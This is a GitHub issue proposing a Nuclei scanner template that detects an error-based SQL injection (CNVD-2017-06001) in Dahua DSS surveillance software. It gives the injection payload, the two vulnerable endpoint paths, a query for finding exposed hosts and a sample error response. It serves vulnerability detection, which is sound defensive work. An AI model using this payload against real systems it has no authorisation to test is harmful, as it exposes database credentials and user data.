Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[nuclei-template] CNVD-2017-06001 Dahua DSS SQL injection #9423

Closed
shibeta opened this issue Mar 27, 2024 · 1 comment · Fixed by #9790
Closed

[nuclei-template] CNVD-2017-06001 Dahua DSS SQL injection #9423

shibeta opened this issue Mar 27, 2024 · 1 comment · Fixed by #9790
Assignees
@ritikchaddha
Labels
Done Ready to merge good first issue Good for newcomers nuclei-template Nuclei template contribution

Comments

@shibeta
Copy link

shibeta commented Mar 27, 2024

Template Information:

Dahua DSS Digital Surveillance System is a security video monitoring system developed by Dahua.

A SQL injection vulnerability exists within Dahua DSS. Attackers can send specially crafted data packets to the attachment_clearTempFile.action or attachment_getAttList.action route, exploiting error-based injection to acquire sensitive information from the database. Beyond obtaining information from the database such as administrator credentials and personal information of users on the site, attackers could potentially write trojans to the server with sufficient privileges and further gain system-level access.

Relevant vulnerability ID: CNVD-2017-06001

Nuclei Template:

id: CNVD-2017-06001

info:
  name: error-based SQL Injection in Dahua DSS
  author: napgh0st
  tags: cnvd,cnvd2017,sql-injection,dahua
  reference: https://www.cnvd.org.cn/flaw/show/CNVD-2017-06001
  severity: high
  metadata:
    fofa-query: app="dahua-DSS"

variables:
  random_num: "{{rand_int(10000, 99999)}}"
  random_text: "{{rand_base(5)}}"
  payload: "{{rand_int(800000, 999999)}}"
  poc: "1') AND EXTRACTVALUE({{random_num}},CONCAT(0x5c,(SELECT (ELT({{random_num}}={{random_num}},{{payload}}))),0x5c)) AND ('{{random_text}}'='{{random_text}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/portal/attachment_clearTempFile.action?bean.RecId={{poc}}&bean.TabName=1"
      - "{{BaseURL}}/portal/attachment_getAttList.action?bean.RecId={{poc}}&bean.TabName=1"

    stop-at-first-match: true

    matchers:
      - type: word
        part: body
        condition: and
        words:
          - "XPATH syntax error"
          - "{{payload}}"

valid match response snippet:

org.springframework.jdbc.UncategorizedSQLException: PreparedStatementCallback; uncategorized SQLException for SQL [select * from C_ATTACHMENT t where 1=1 and t.tab_Name=?   and t.rec_Id in('1') AND EXTRACTVALUE(32776,CONCAT(0x5c,(SELECT (ELT(32776=32776,909836))),0x5c)) AND ('6jQ6F'='6jQ6F')   and t.tmp_flag = ?]; SQL state [HY000]; error code [1105]; XPATH syntax error: '\909836\'; nested exception is java.sql.SQLException: XPATH syntax error: '\909836\'
@shibeta shibeta added the nuclei-template Nuclei template contribution label Mar 27, 2024
@ritikchaddha ritikchaddha linked a pull request May 14, 2024 that will close this issue
Create CNVD-2017-06001.yaml #9790
Merged
2 tasks
@ritikchaddha ritikchaddha added good first issue Good for newcomers Done Ready to merge labels May 14, 2024
@ritikchaddha
Copy link
Contributor

Hello @shibeta, thank you so much for sharing this template with the community and contributing to this project 🍻

You can grab some cool PD stickers over here http://nux.gg/stickers 😄

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@ritikchaddha ritikchaddha

Labels
Done Ready to merge good first issue Good for newcomers nuclei-template Nuclei template contribution
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Create CNVD-2017-06001.yaml projectdiscovery/nuclei-templates
2 participants
@shibeta @ritikchaddha